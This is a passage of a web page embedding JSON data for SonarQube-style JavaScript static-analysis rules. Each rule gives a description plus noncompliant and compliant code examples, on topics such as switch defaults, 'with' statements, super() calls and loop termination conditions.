Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) => { \/* ... *\/ }; \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) => { return 0; }; \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a => { \/* ... *\/ };\nvar bar = (a, b) => 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n constructor(initializerArgs = []) {\n this._values = [...initializerArgs];\n }\n\n doSomething() {\n \/\/...\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. Fortunately,\nES2015, provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) { \/\/ Noncompliant\n \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js'); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob'; \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n name: 'bob',\n arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code>, only the first argument will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch a {\n case 1,2: \/\/ Noncompliant; only 2 is ever handled by this case\n doTheThing(a);\n case 3 || 4: \/\/ Noncompliant; only '3' is handled\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\"); \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch a {\n case 1:\n case 2:\n doTheThing(a);\n case 3:\n case 4:\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n this.numeric = numeric;\n this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum(); \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num(); \/\/ Noncompliant. undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>>, <, >=, <=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x; \/\/ x is currently \"undefined\"\nif (someCondition()) {\n x = 42;\n}\n\nif (42 > x) { \/\/ Noncompliant; \"x\" might still be \"undefined\"\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj > 24) { \/\/ Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n x = 42;\n} else {\n x = foo();\n}\n\nif (42 > x) {\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop > 24) {\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x < 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) < 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is a of primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x; \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x; \/\/ true\n0 in x; \/\/ true\n\"foobar\" in x; \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n <li> <code>Array.from<\/code> <\/li>\n <li> <code>Array.prototype.every<\/code> <\/li>\n <li> <code>Array.prototype.filter<\/code> <\/li>\n <li> <code>Array.prototype.find<\/code> <\/li>\n <li> <code>Array.prototype.findIndex<\/code> <\/li>\n <li> <code>Array.prototype.map<\/code> <\/li>\n <li> <code>Array.prototype.reduce<\/code> <\/li>\n <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n <li> <code>Array.prototype.some<\/code> <\/li>\n <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n constructor() {\n super(); \/\/ Noncompliant, super() cannot be invoked in a base class\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n this.name = name;\n super.doSomething();\n super(); \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n }\n\n doSomething() {\n super(); \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(); \/\/ Noncompliant, super() must be invoked with one argument\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n } \/\/ Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n super(name); \/\/ Noncompliant, super() can only be invoked once\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n constructor() {\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n super();\n this.name = name;\n super.doSomething();\n }\n\n doSomething() {\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) { \/\/ Noncompliant\n doOneMoreThing();\n}\nelse {\n doOneMoreThing();\n}\n\nlet a = (b == 0) ? getValue() : getValue(); \/\/ Noncompliant\n\nswitch (i) { \/\/ Noncompliant\n case 1:\n doSomething();\n break;\n case 2:\n doSomething();\n break;\n case 3:\n doSomething();\n break;\n default:\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2) \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i <= 10; i += 2) \/\/ Compliant\n{\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n <li> starts above the ending value and is decremented by 1 on each iteration. <\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 6-5-2 <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even thought it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n 'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) { \/\/missing default clause\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n\nswitch (param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n var seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(drop) { \/\/ Non-Compliant; defines a new 'drop' parameter\n if(Droppables.isAffected(point, element, drop))\n affected.push(drop);\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(aDrop) {\n if(Droppables.isAffected(point, element, aDrop))\n affected.push(aDrop);\n });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n identifier <\/li>\n <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nwith (foo) { \/\/ Noncompliant\n y = 4; \/\/ updates foo.x\n x = 3; \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":92,"p":1,"ps":500,"rules":[{"key":"common-js:InsufficientBranchCoverage","repo":"common-js","name":"Branches should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the branch coverage on this file is less than the required threshold.It gives the number of branches to be covered in order to reach the required threshold.","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"minimumBranchCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"javascript:ArrayAndObjectConstructors","repo":"javascript","name":"Array constructors should not be used","htmlDesc":"<p>Array literals should always be preferred to Array constructors.<\/p>\n<p>Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be\nequal to the number of arguments. However, using a single argument will have one of three consequences:<\/p>\n<ul>\n <li> If the argument is a number and it is a natural number the length will be equal to the value of the argument. <\/li>\n <li> If the argument is a number, but not a natural number an exception will be thrown. <\/li>\n <li> Otherwise the array will have one element with the argument as its value. <\/li>\n<\/ul>\n<p>For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid\nthese kinds of weird cases, always use the more readable array.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a1 = new Array(x1, x2, x3); \/\/ Noncompliant. Results in 3-element array.\nvar a2 = new Array(x1); \/\/ Noncompliant and variable in results\nvar a3 = new Array(); \/\/ Noncompliant. Results in 0-element array.\n\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar a1 = [x1, x2, x3];\nvar a2 = [x1];\nvar a3 = [];\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:AssignmentWithinCondition","repo":"javascript","name":"Assignments should not be made from within sub-expressions","htmlDesc":"<p>Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have\nside-effects.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ((str = cont.substring(pos1, pos2)) != '') { \/\/ Noncompliant\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstr = cont.substring(pos1, pos2);\nif (str != '') {\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Assignments in <code>while<\/code> statement conditions, and assignments enclosed in relational expressions are allowed.<\/p>\n<pre>\nwhile ((line = nextLine()) != null) {...} \/\/ Compliant\n\nwhile (line = nextLine()) {...} \/\/ Compliant\n\nif (line = nextLine()) {...} \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.1 - Assignment operators shall not be used in expressions that yield a Boolean value <\/li>\n <li> MISRA C++:2008, 6-2-1 - Assignment operators shall not be used in sub-expressions <\/li>\n <li> MISRA C:2012, 13.4 - The result of an assignment operator should not be used <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/481.html\">MITRE, CWE-481<\/a> - Assigning instead of Comparing <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/nYFtAg\">CERT, EXP45-C.<\/a> - Do not perform assignments in selection statements <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1gCTAw\">CERT, EXP51-J.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KQvhAg\">CERT, EXP19-CPP.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KYIyAQ\">CERT, MSC02-CPP.<\/a> 